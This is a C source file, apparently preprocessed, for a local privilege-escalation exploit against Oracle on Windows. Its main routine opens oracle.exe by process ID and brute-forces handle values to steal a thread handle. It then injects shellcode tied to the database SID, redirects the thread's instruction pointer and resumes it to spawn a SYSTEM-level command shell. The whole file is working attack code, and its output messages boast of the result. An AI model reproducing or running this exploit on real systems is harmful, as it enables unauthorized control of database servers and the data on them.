
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_1__ ;


typedef char _TCHAR ;
struct TYPE_4__ {int Eip; int ContextFlags; } ;
typedef int HANDLE ;
typedef int DWORD ;
typedef TYPE_1__ CONTEXT ;
typedef char CHAR ;
typedef scalar_t__ BOOL ;


 int CONTEXT_CONTROL ;
 int CloseHandle (int) ;
 int DUPLICATE_SAME_ACCESS ;
 scalar_t__ DuplicateHandle (int,int,int ,int*,int ,scalar_t__,int ) ;
 scalar_t__ FALSE ;
 int GetCurrentProcess () ;
 int GetThreadContext (int,TYPE_1__*) ;
 scalar_t__ InjectShellcode (int,char*) ;
 int OpenProcess (int ,scalar_t__,int) ;
 int PROCESS_DUP_HANDLE ;
 int ResumeThread (int) ;
 int SetThreadContext (int,TYPE_1__*) ;
 int Sleep (int) ;
 scalar_t__ SuspendThread (int) ;
 scalar_t__ TRUE ;
 int atoi (char*) ;
 int printf (char*,...) ;

int _tmain(int argc, _TCHAR* argv[])
{
 HANDLE hSrcHandle=0,hTgtHandle=0,hProcess=0;
 BOOL bSuccess=FALSE;
 DWORD pid,j;
 CHAR * oraSID;
 CONTEXT Context;

 if(!argv[1]||!argv[2]){
  printf("Usage %s Oracle.exe PID SID , example: %s 453 orcl\n",argv[0],argv[0]);
  return 0;
 }

 oraSID= argv[2];
 pid=atoi(argv[1]);

 printf("\nOpening oracle.exe PID: %d\n",pid);

 hProcess=OpenProcess(PROCESS_DUP_HANDLE ,FALSE,pid);
 if(!hProcess){
  printf("\nCouldn't open oracle.exe process\n");
  printf("\nCheck Oracle PID\n");
  return 0;
 }


 for (j=0x200;j<=0x1000;j+=4){
  hSrcHandle=(HANDLE)j;

  if(DuplicateHandle(hProcess,hSrcHandle,GetCurrentProcess(),&hTgtHandle,0,FALSE,DUPLICATE_SAME_ACCESS )){

   if(SuspendThread(hTgtHandle)==0){
    printf("Found thread handle: 0x%x\n",hSrcHandle);

    Context.ContextFlags = CONTEXT_CONTROL;
    GetThreadContext(hTgtHandle, &Context);

    if (InjectShellcode(Context.Eip,oraSID)){
     printf("Changing thread context...\n");



     Context.Eip = 0x048a0500;


     SetThreadContext(hTgtHandle, &Context);
     ResumeThread(hTgtHandle);

     printf("Running exploit...\n");
     bSuccess=TRUE;

     Sleep(2000);
    }
    else
     bSuccess=FALSE;

    CloseHandle(hTgtHandle);
    break;

   }
   CloseHandle(hTgtHandle);
  }
 }

 if (bSuccess)
  printf("\nYou should have a command shell running as Local System :)\n");
 else
 {
  printf("\nCheck Oracle SID\n");
 }

 CloseHandle(hProcess);
 return 0;
}
